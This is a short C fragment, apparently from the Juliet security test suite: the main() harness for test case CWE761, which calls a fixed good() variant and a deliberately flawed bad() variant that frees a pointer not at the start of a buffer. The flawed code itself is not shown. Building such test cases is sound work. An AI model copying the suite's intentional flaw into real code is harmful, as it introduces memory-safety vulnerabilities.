#ifdef INCLUDEMAIN
int main(int argc, char * argv[])
{
/* seed randomness */
srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
printLine("Calling good()...");
CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_good();
printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
printLine("Calling bad()...");
CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_bad();
printLine("Finished bad()");
#endif /* OMITBAD */
return 0;
}
#endif
| {
"pile_set_name": "Github"
} |